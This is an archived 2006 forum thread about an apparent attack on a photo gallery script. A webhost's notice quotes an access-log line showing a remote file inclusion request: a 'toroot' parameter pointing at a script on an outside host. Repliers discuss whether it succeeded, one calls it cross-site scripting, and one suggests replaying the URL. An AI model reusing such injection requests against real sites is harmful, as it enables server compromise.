PDA

View Full Version : EE2.0 already Hacked? (BOGUS)

lost
6th of October 2006 (Fri), 11:34
Pekka,

I just got this from my webhost.

It has come to our attention that your web space has been hacked:

access.log.39.gz:84.254.189.88 (http://84.254.189.88/) - - [01/Oct/2006:19:20:35 -0400] "POST
/gallery/photo_comment.php?toroot=http://www.kairosperu.org/language/blo
g.txt (http://www.kairosperu.org/language/blog.txt)? HTTP/1.1" 200 178553 www.btoups.com (http://www.btoups.com/)
"http://www.btoups.com/gallery/photo_comment.php?toroot=http://www.kairo (http://www.btoups.com/gallery/photo_comment.php?toroot=http://www.kairo)
speru.org/language/blog.txt (http://speru.org/language/blog.txt)?" "Mozilla/4.0 (compatible; MSIE 6.0;
Windows NT 5.1; SV1)" "-"

--

The above was taken from your access logs. It shows that
/gallery/photo_comment.php was used to perpetrate the hack.

Please contact the developers for this script/application. You will
likely need to install a version update and/or security patch to prevent
further abuse.
Pekka
6th of October 2006 (Fri), 11:43
To me it looks like attempt, not hacked.
There is no file http://www.btoups.com/gallery/photo_comment.php, in EE 2.0 it is called comments.php

photo_comment.php is from version 1.5. Did you delete all EE 1.5 files from your EE folder as instructed in upgrade post?
lost
6th of October 2006 (Fri), 12:01
To me it looks like attempt, not hacked.
There is no file http://www.btoups.com/gallery/photo_comment.php, in EE 2.0 it is called comments.php

photo_comment.php is from version 1.5. Did you delete all EE 1.5 files from your EE folder as instructed in upgrade post?


Bah... after looking at the date, it is prior to installing 2.0. I got the email a day after installing 2.0.


Please DELETE
Pekka
6th of October 2006 (Fri), 12:02
Phew! :)
wkitty42
11th of October 2006 (Wed), 22:42
To me it looks like attempt, not hacked.
There is no file http://www.btoups.com/gallery/photo_comment.php, in EE 2.0 it is called comments.php
it is exactly an attempt... this is a cross-site scripting attempt... i get them all the time but they all fail for various reasons... the original poster's webhost needs to get a cluepon or face liberal use of a LART aka cluebat ;)

all one needs do to see if it is a hack is to try the very same url as the log shows ;)
UncleDoug
18th of October 2006 (Wed), 14:57
Backtracking on the issue with 1.5 I found several sub-domains, which I did not set up or configure, associated with my site.
Definitely remove them if they are there.